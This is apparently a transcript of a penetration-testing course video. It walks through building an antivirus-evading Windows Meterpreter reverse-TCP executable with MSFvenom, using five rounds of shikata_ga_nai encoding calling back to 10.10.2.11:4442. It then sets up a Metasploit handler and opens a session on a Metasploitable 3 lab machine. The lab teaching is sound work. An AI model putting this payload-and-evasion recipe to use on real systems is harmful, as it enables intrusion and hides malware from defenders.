So I showed you earlier in the fourth section about encoders. MSFvenom uses these encoders to keep you hidden from antivirus softwares. Encoders alter the code in an executable so that it looks different to antiviruses. They encode the original executable in a new binary, so that when the executable is run, the original code is decoded into memory and executed. Now, different encoders are used for different platforms. MSFvenom also has an option to iterate the encoding process. So what I mean by that is it allows for multi-encoding. I'll show you by example. So to create an encoded payload, you're going to need to specify with the E parameter. And then to iterate the encoding for several times, use the I parameter. So it is very easy to use a payload. Now, the only thing that I want you to know is the encoder name and if it's suitable for your needs. So let's generate a file that contains an encoded payload. MSFvenom P Windows Meterpreter reverse TCP lhost equals 10.10.2.11 and lport equals 4442. And the platform is Windows. Architecture is 32-bit. File type is a Windows executable. And then E is the encoder name, x86//SHIKATA_GA_NAI. I5 to iterate the encoding 5 times. And then let's give a name to the output file. So here we're going to need to be careful that we use a suitable encoder for the other parameters, such as architecture. All right, so now that file is created and saved. ls. And look, there it is. The file is a 32-bit Windows executable. So now we're going to need a handler. So open MSF console, and I'm already using the handler template. So let's see some options. All right, so now I'm going to need to change everything. So set payload to Windows Meterpreter reverse TCP. Set lhost to 10.10.2.11. Set lport to 4442. And nothing to set. Show the options again, and everything looks fine. Now then, exploit J. The Python server is still running, so open Metasploitable 3 and refresh the page. Download and save encoded.exe file to the desktop. Now let's open the MSF console to observe this session. And now let's run the encoded.exe by double-clicking. And if you look over onto the left pane, you can see that the session has opened. Sessions. All right, so you got the session on port 4442. So now you can interact with session 2, get UID, sysinfo, and this is definitely Metasploitable 3.